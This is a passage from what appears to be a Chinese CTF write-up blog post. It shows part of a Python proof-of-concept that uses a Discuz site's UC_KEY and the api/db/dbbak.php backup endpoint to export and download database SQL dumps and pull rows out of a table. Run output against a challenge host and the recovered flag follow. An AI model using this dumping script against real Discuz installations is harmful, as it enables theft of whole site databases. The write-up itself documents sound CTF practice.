    ap = argparse.ArgumentParser(description='Discuz dbbak export PoC to extract pre_a_flag')
    ap.add_argument('--base', required=True, help='Base URL of site, e.g. http://127.0.0.1')
    ap.add_argument('--key', required=True, help='UC_KEY')
    ap.add_argument('--dump-table', help='Dump all rows of the specified table (e.g., pre_a_flag)')
    args = ap.parse_args()

    if args.dump_table:
        print(f'[*] Dumping table: {args.dump_table}')
        cols, rows = dump_table_via_backup(args.base, args.key, args.dump_table)
        if rows is None:
            print('[-] Failed to collect backup SQL files')
            return
        if not rows:
            print('[-] No rows found')
            return
        if cols:
            print('[+] Columns:', ', '.join(cols))
        else:
            print('[!] Column names not found; printing values by position')
        print('[+] Rows:')
        for i, r in enumerate(rows, 1):
            # Render row as CSV-like line
            rendered = []
            for v in r:
                if v is None:
                    rendered.append('NULL')
                else:
                    s = str(v)
                    if any(c in s for c in [',', '"', '\n', '\r']):
                        s = '"' + s.replace('"', '""') + '"'
                    rendered.append(s)
            print(f'   {i}: ' + ', '.join(rendered))
        return

    print('[*] Starting export via api/db/dbbak.php ...')
    files = export_and_collect(args.base, args.key)
    if not files:
        print('[-] No files collected')
        return
    print('[+] Collected files:')
    for u in files:
        print('   -', u)

    sess = requests.Session()
    for u in files:
        print('[*] Downloading', u)
        r = sess.get(u, timeout=90)
        if r.status_code != 200:
            print('   [-] HTTP', r.status_code)
            continue
        # Remove the guard line if present
        body = r.text
        body = body.replace('# <?php exit();?>\n', '')
        flag, line = extract_flag_from_sql(body)
        if flag:
            print('[+] FLAG:', flag)
            if line:
                print('[+] Source line:', line)
            return
    print('[-] Flag not found in collected volumes')

if __name__ == '__main__':
    main()

犯蠢了,第一个字段是flag{test_flag}以为题目有问题,但其实就在第二个字段里,输出中包含了dump这个sql库的地址,可以直接下到导出的sql文件:

[*] Starting export via api/db/dbbak.php ...
[+] Collected files:
   - http://challenge.xinshi.fun:45045/data/backup_250816_tJ8bkZ/250816_ef2rO5-1.sql 
[*] Downloading http://challenge.xinshi.fun:45045/data/backup_250816_tJ8bkZ/250816_ef2rO5-1.sql
[+] FLAG: flag{test_flag}
[+] Source line: INSERT INTO pre_a_flag VALUES ('1',flag{test_flag});

得到十六进制存储的数值,解一下:

拿到flag:LILCTF{h4V3_Y0U_1oUNd_@_j#8_now?_h4HaH@}

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇